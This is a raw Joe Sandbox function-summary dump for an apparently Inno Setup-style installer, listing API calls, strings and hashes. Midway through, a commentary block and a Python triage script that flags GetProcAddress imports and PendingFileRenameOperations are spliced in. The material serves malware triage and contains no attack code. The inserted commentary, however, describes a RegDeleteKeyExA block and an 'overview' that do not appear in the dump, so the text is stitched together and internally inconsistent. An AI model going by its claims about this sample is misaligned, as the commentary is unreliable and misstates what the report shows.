                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressByteCharMultiProcWide
                                                                                      • String ID: SfcIsFileProtected$sfc.dll
                                                                                      • API String ID: 2508298434-591603554
                                                                                      • Opcode ID: 7bac0491a20355553d1817e9708559ea9c2ee3dc019520cc376e2a618a3a3bbf
                                                                                      • Instruction ID: 8896df26e74b4f53e6f77957fc07a02fe6ad1856ac683947f167e21e68caa71d
                                                                                      • Opcode Fuzzy Hash: 7bac0491a20355553d1817e9708559ea9c2ee3dc019520cc376e2a618a3a3bbf
                                                                                      • Instruction Fuzzy Hash: 9D4167B0A042189FEB10DF55DC85B9D77B8AB04346F5041BBB908A7293D7785F48CE5C
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0045271B,?,?,00000000,00496628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452672
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0045271B,?,?,00000000,00496628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045267B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID: .tmp$o1I
                                                                                      • API String ID: 1375471231-2043145612
                                                                                      • Opcode ID: 6263e7da38dc712251df72676f2ee857ab2003e645070e4b394e34e858e0385a
                                                                                      • Instruction ID: 89aaa5dd644a1bfb9c6e4ab11305a67587a6d25824e33790291d603b6c08dcc0
                                                                                      • Opcode Fuzzy Hash: 6263e7da38dc712251df72676f2ee857ab2003e645070e4b394e34e858e0385a
                                                                                      • Instruction Fuzzy Hash: 14216575A002089BDB01EFA1C9929DFB7B8EF58305F50457BEC01B7342DA7CAE058AA5
                                                                                      APIs
                                                                                      • 74D31520.VERSION(00000000,?,?,?,] I), ref: 00451138
                                                                                      • 74D31500.VERSION(00000000,?,00000000,?,00000000,004511B3,?,00000000,?,?,?,] I), ref: 00451165
                                                                                      • 74D31540.VERSION(?,004511DC,?,?,00000000,?,00000000,?,00000000,004511B3,?,00000000,?,?,?,] I), ref: 0045117F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: D31500D31520D31540
                                                                                      • String ID: ] I
                                                                                      • API String ID: 1003763464-27375975
                                                                                      • Opcode ID: ae97c8c8a0c1eba3379072f8b46b7e7df9da348ac85090545a8034cef28368fb
                                                                                      • Instruction ID: c2ad28a97d73236a39d00b1522cfa6caf261f6f5eba90309d69346832355d152
                                                                                      • Opcode Fuzzy Hash: ae97c8c8a0c1eba3379072f8b46b7e7df9da348ac85090545a8034cef28368fb
                                                                                      • Instruction Fuzzy Hash: 5D219235A00508AFDB01DAA98C41EBFB7FCEB49340F5544BAFD00E3392D6799E058769
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,00454467,?,00000001,00000000), ref: 0045445A
                                                                                      Strings
                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454408
                                                                                      • PendingFileRenameOperations, xrefs: 0045442C
                                                                                      • PendingFileRenameOperations2, xrefs: 0045443B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                      • API String ID: 47109696-2115312317
                                                                                      • Opcode ID: 4d74768cc722451e6c2d7b21cab6517138d2d42bcabe4ec3ebcd03ef8cae5871
                                                                                      • Instruction ID: f6b2750a9208994f71abef58e55a78fed862e8850860690132b194e4ac46e676
                                                                                      • Opcode Fuzzy Hash: 4d74768cc722451e6c2d7b21cab6517138d2d42bcabe4ec3ebcd03ef8cae5871
                                                                                      • Instruction Fuzzy Hash: C0F062313442046FDB04D6A6EC12B5B73ADD7C5B19FA0446AFC009A682DA79AD48D51C
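The two preceding function blocks show patterns a triager wants pulled out of a dump like this automatically: the first resolves RegDeleteKeyExA through GetModuleHandleA/GetProcAddress and falls back to RegDeleteKeyA (the "dynamically determine API calls" signature from the overview; the SfcIsFileProtected block above does the same with sfc.dll), and the one just above touches the Session Manager key's PendingFileRenameOperations value, the list the system processes at the next boot to rename or delete files. The following Python helper is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses function-summary blocks in the text layout shown on this page and reports both patterns. The SAMPLE excerpt is constructed in that layout from the blocks above; the HIVES table maps the predefined HKEY handle values that appear as RegOpenKeyExA's first argument.

```python
"""Triage helper for Joe Sandbox function-summary blocks (added example; parses the
'APIs' bullets 'Name.DLL(args), ref: ADDR', the 'Strings' bullets 'text, xrefs: ADDR'
and the 'String ID:' summary line, then flags dynamic imports and reboot-time renames)."""
import re
from dataclasses import dataclass, field

# Predefined hive handles as they appear in RegOpenKeyExA's first argument.
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z0-9_]+)\.(?P<dll>[A-Za-z0-9_]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$")
XREF_RE = re.compile(r"^\s*•\s*(?P<text>.+?), xrefs: (?P<ref>[0-9A-Fa-f]+)\s*$")
STRING_ID_RE = re.compile(r"^\s*•\s*String ID: (?P<ids>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed excerpt in the report's layout (two of the blocks above, shortened).
SAMPLE = r"""
APIs
• RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000), ref: 0042DCA3
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
Strings
Similarity
• String ID: RegDeleteKeyExA$advapi32.dll
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,00454467), ref: 0045445A
Strings
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454408
• PendingFileRenameOperations, xrefs: 0045442C
• PendingFileRenameOperations2, xrefs: 0045443B
Similarity
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
"""


@dataclass
class ApiCall:
    name: str
    dll: str
    args: list
    ref: str


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, xref address)
    string_ids: list = field(default_factory=list)  # tokens of the 'String ID:' line


def parse_blocks(text):
    """Split the dump into one FunctionBlock per 'APIs' header."""
    blocks, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            section = "APIs"
            continue
        if current is None:
            continue
        if stripped in SECTION_HEADERS:
            section = stripped
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            current.apis.append(ApiCall(m["name"], m["dll"], m["args"].split(",") if m["args"] else [], m["ref"]))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            current.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := STRING_ID_RE.match(line)):
            current.string_ids = [s for s in m["ids"].split("$") if s]
    return blocks


def dynamic_imports(block):
    """Export names the function resolves at run time: the block calls GetProcAddress and its
    String ID carries plain identifiers (module names such as advapi32.dll contain a dot and drop out)."""
    if not any(call.name == "GetProcAddress" for call in block.apis):
        return []
    return [s for s in block.string_ids if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", s)]


def triage(text):
    """One human-readable finding per flagged call or string, in block order."""
    findings = []
    for i, block in enumerate(parse_blocks(text)):
        for name in dynamic_imports(block):
            findings.append(f"block {i}: resolves {name} via GetProcAddress (dynamic import)")
        for call in block.apis:
            if call.name.startswith("RegOpenKey") and len(call.args) >= 2:
                hive = HIVES.get(call.args[0].upper(), call.args[0])
                findings.append(f"block {i}: opens {hive}\\{call.args[1]} at {call.ref}")
        for value, ref in block.strings:
            if value.startswith("PendingFileRenameOperations"):
                findings.append(f"block {i}: references {value} at {ref} "
                                "(Session Manager reboot-time rename/delete list)")
    return findings


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

Feed it the function-summary text of a whole report and read the findings next to the behaviour signatures: a PendingFileRenameOperations reference on its own is ordinary installer behaviour (it is how a setup program removes files that are in use until reboot), so it is a lead to check against the dropped-file list and the reboot/shutdown signature, not a verdict by itself. The dynamic-import list is the part worth keeping; names resolved through GetProcAddress never appear in the static import table, so they are what a static triage of the PE would have missed.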
                                                                                      APIs
                                                                                      • GetMenu.USER32(00000000), ref: 004212D1
                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004212EE
                                                                                      • SetMenu.USER32(00000000,00000000), ref: 00421323
                                                                                      • SetMenu.USER32(00000000,00000000), ref: 0042133F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu
                                                                                      • String ID:
                                                                                      • API String ID: 3711407533-0
                                                                                      • Opcode ID: 828adb1f4503573b8b19ec7e50c880e5d7ba93b5c851f867c46ca8f401a21855
                                                                                      • Instruction ID: 658f50d7c39b10a4f0c402205ec9e9078e39c2738942e4c3e39302bb3a71e335
                                                                                      • Opcode Fuzzy Hash: 828adb1f4503573b8b19ec7e50c880e5d7ba93b5c851f867c46ca8f401a21855
                                                                                      • Instruction Fuzzy Hash: 7641BE307002645BEB20AA7AA88579B37914F65308F4845BFFC44EF3A7CA7DCC4582AD
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416AF4
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416B0E
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416B28
                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 601730667-0
                                                                                      • Opcode ID: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                                      • Instruction ID: c000e8b01db0500dd6874d208778bcf8efa3d9016d5589f965051e8255cd057a
                                                                                      • Opcode Fuzzy Hash: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                                      • Instruction Fuzzy Hash: 74115EB2604604AFC710EE6ECC84E8777ECEF49710B15886BB55ADB652C638FC418B79
                                                                                      APIs
                                                                                      • EnumWindows.USER32(0042398C), ref: 00423A18
                                                                                      • GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                                      • SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnumLongWindows
                                                                                      • String ID:
                                                                                      • API String ID: 4191631535-0
                                                                                      • Opcode ID: b2f5db6fe163c30d8c8c0473a117728a579ec2d7ead3c741ce22ac317b482cf1
                                                                                      • Instruction ID: 335c349655b4e4ce664b27c97d7ab575fba50449cb033fde685ace27ceb71c75
                                                                                      • Opcode Fuzzy Hash: b2f5db6fe163c30d8c8c0473a117728a579ec2d7ead3c741ce22ac317b482cf1
                                                                                      • Instruction Fuzzy Hash: 91115A70700610ABDB10EF68DC85F5A77E8EB08725F11026AF9A4AB2E2C37CDC40CB58
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                                      • EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A14620A480A570EnumFonts
                                                                                      • String ID:
                                                                                      • API String ID: 2780753366-0
                                                                                      • Opcode ID: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                                      • Instruction ID: 4d68480f6d607538855b0f171b38ffa839f5ce6e0578d669e72114bdc8101102
                                                                                      • Opcode Fuzzy Hash: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                                      • Instruction Fuzzy Hash: 0601D2616053002AE700BF6A5C82B9B37649F00709F40027BF804AF2C7D6BE9805476E
                                                                                      APIs
                                                                                      • WaitForInputIdle.USER32(00000001,00000032), ref: 0045399C
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004539BE
                                                                                      • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
                                                                                      • CloseHandle.KERNEL32(00000001,004539FA,004539F3,?,00000031,00000080,00000000,?,?,00453D4B,00000080,0000003C,00000000,00453D61), ref: 004539ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                      • String ID:
                                                                                      • API String ID: 4071923889-0
                                                                                      • Opcode ID: b5c2dbf5272f504e7b06945f00b02d3f578c52004c30b2aed4c8e7ec893f2b0e
                                                                                      • Instruction ID: f26be41c5c034272f157e269139ed2410fa661b94adc91c278c581610335523b
                                                                                      • Opcode Fuzzy Hash: b5c2dbf5272f504e7b06945f00b02d3f578c52004c30b2aed4c8e7ec893f2b0e
                                                                                      • Instruction Fuzzy Hash: 3301F9F06006087EEB219B998C06F6BBB9CDB457A1F600167F904D32C2C5F89E00CA69
                                                                                      APIs
                                                                                      • GlobalHandle.KERNEL32 ref: 00406287
                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                      • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocHandleWire
                                                                                      • String ID:
                                                                                      • API String ID: 2210401237-0
                                                                                      • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                      • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                      • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                      • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                      APIs
                                                                                        • Part of subcall function 00450088: SetEndOfFile.KERNEL32(?,?,0045AA1E,00000000,0045ABA9,?,00000000,00000002,00000002), ref: 0045008F
                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045AB75
                                                                                      Strings
                                                                                      • NumRecs range exceeded, xrefs: 0045AA72
                                                                                      • EndOffset range exceeded, xrefs: 0045AAA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$BuffersFlush
                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                      • API String ID: 3593489403-659731555
                                                                                      • Opcode ID: 284914d50a052015b7c75a6107dacc898a09a70c67966605e73dc69b2178a5f5
                                                                                      • Instruction ID: 49fd1ead36e8c92626c0d22f3e04e342ae71ee3369d077df08b87a69a2b16800
                                                                                      • Opcode Fuzzy Hash: 284914d50a052015b7c75a6107dacc898a09a70c67966605e73dc69b2178a5f5
                                                                                      • Instruction Fuzzy Hash: 68617334A002588FDB24DF25C881BDAB7B5EF49305F0085EAED889B352D674AEC9CF55
                                                                                      APIs
                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004931DE), ref: 0040334B
                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004931DE), ref: 00403356
                                                                                        • Part of subcall function 00409AE8: 6F571CD0.COMCTL32(004931ED), ref: 00409AE8
                                                                                        • Part of subcall function 004108C4: GetCurrentThreadId.KERNEL32 ref: 00410912
                                                                                        • Part of subcall function 00418FB0: GetVersion.KERNEL32(00493201), ref: 00418FB0
                                                                                        • Part of subcall function 0044F178: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00493215), ref: 0044F1B3
                                                                                        • Part of subcall function 0044F178: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F1B9
                                                                                        • Part of subcall function 0044F55C: GetVersionExA.KERNEL32(00496780,0049321A), ref: 0044F56B
                                                                                        • Part of subcall function 00451DF8: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E18
                                                                                        • Part of subcall function 00451DF8: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E1E
                                                                                        • Part of subcall function 00451DF8: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E32
                                                                                        • Part of subcall function 00451DF8: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E38
                                                                                        • Part of subcall function 00460EAC: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00493238), ref: 00460EBB
                                                                                        • Part of subcall function 00460EAC: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460EC1
                                                                                        • Part of subcall function 00468C50: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 00468C65
                                                                                        • Part of subcall function 00474088: GetModuleHandleA.KERNEL32(kernel32.dll,?,00493242), ref: 0047408E
                                                                                        • Part of subcall function 00474088: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047409B
                                                                                        • Part of subcall function 00474088: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004740AB
                                                                                        • Part of subcall function 00490338: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00490351
                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,0049328A), ref: 0049325C
                                                                                        • Part of subcall function 00492FE0: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00493266,00000001,00000000,0049328A), ref: 00492FEA
                                                                                        • Part of subcall function 00492FE0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00492FF0
                                                                                        • Part of subcall function 00424444: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424463
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • ShowWindow.USER32(?,00000005,00000000,0049328A), ref: 004932CD
                                                                                        • Part of subcall function 0047D0AC: SetActiveWindow.USER32(?), ref: 0047D150
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModeRegisterSendShowTextThread
                                                                                      • String ID: Setup
                                                                                      • API String ID: 4109318208-3839654196
                                                                                      • Opcode ID: fee832f36ce975679e260f9b0954113cf3741595f260ce40ded7ca7ebb5c54dd
                                                                                      • Instruction ID: 779a321fc15f42447a8f0963ad68d9f2a93317841f7d3acf2e890d1de8ee30c9
                                                                                      • Opcode Fuzzy Hash: fee832f36ce975679e260f9b0954113cf3741595f260ce40ded7ca7ebb5c54dd
                                                                                      • Instruction Fuzzy Hash: 0531A3312146409FDB11BBB7AC1351D3BA4EB8A71DBA2447FF804C2653CE3D5C548A6E
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,?,dE,00000000,004564D0,?,?,?,00000000,0045146A,?,?,?,00000001), ref: 00451444
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,dE,00000000,004564D0,?,?,?,00000000,0045146A,?,?,?,00000001), ref: 0045144C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorLastProcess
                                                                                      • String ID: dE
                                                                                      • API String ID: 2919029540-3809906464
